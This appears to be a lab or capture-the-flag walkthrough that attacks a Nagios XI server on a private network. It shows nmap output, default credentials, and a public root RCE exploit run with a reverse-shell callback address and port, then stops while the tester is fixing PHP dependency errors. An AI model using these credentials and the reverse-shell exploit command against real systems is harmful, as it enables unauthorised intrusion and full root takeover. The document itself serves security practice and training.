PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b8:8c:40:f6:5f:2a:8b:f7:92:a8:81:4b:bb:59:6d:02 (RSA)
| 256 e7:bb:11:c1:2e:cd:39:91:68:4e:aa:01:f6:de:e6:19 (ECDSA)
|_ 256 0f:8e:28:a7:b7:1d:60:bf:a6:2b:dd:a3:6d:d1:4e:a4 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2020-09-08T17:59:00
|_Not valid after: 2030-09-06T17:59:00
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Nagios XI
|_http-server-header: Apache/2.4.18 (Ubuntu)
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=192.168.1.6/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US
| Not valid before: 2020-09-08T18:28:08
|_Not valid after: 2030-09-06T18:28:08
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.18 (Ubuntu)
| tls-alpn:
|_ http/1.1
5667/tcp open tcpwrapped
Service Info: Host: ubuntu; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Browsing to port 80, we clicked on Access Nagios XI and were redirected.
A Google search showed that the default credentials of Nagios XI are admin upon setup:
https://docs.cloudera.com/HDPDocuments/HDP1/HDP-1.2.1/bk_installing_manually_book/content/rpm-chap12-2-3.html
nagiosadmin:admin
We found this RCE exploit that can get root directly:
https://github.com/jakgibb/nagiosxi-root-rce-exploit
php exploit.php --host=192.168.81.136 --ssl=false --user=nagiosadmin --pass=admin --reverseip=192.168.49.81 --reverseport=1234
Running it produced an error:
┌──(kali㉿VirtualBox)-[~/Desktop]
└─$ php exploit.php --host=192.168.81.136 --ssl=false --user=nagiosadmin --pass=admin --reverseip=192.168.49.81 --reverseport=1234
PHP Fatal error: Uncaught Error: Call to undefined function curl_init() in /home/kali/Desktop/exploit.php:32
Stack trace:
#0 /home/kali/Desktop/exploit.php(22): extractNSP()
#1 {main}
thrown in /home/kali/Desktop/exploit.php on line 32
We went to Stack Overflow and found the solution: https://stackoverflow.com/questions/6382539/call-to-undefined-function-curl-init
sudo apt-get install php-curl
Then we ran the command again; this time we got another error:
┌──(kali㉿VirtualBox)-[~/Desktop]
└─$ php exploit.php --host=192.168.81.136 --ssl=false --user=nagiosadmin --pass=admin --reverseip=192.168.49.81 --reverseport=1234
[+] Grabbing NSP from: <https://192.168.81.136/nagiosxi/login.php>
[+] Retrieved page contents from: <https://192.168.81.136/nagiosxi/login.php>
PHP Fatal error: Uncaught Error: Class "DOMDocument" not found in /home/kali/Desktop/exploit.php:51
Stack trace:
#0 /home/kali/Desktop/exploit.php(22): extractNSP()
#1 {main}
thrown in /home/kali/Desktop/exploit.php on line 51
Another easy fix from Stack Overflow: https://stackoverflow.com/questions/14395239/class-domdocument-not-found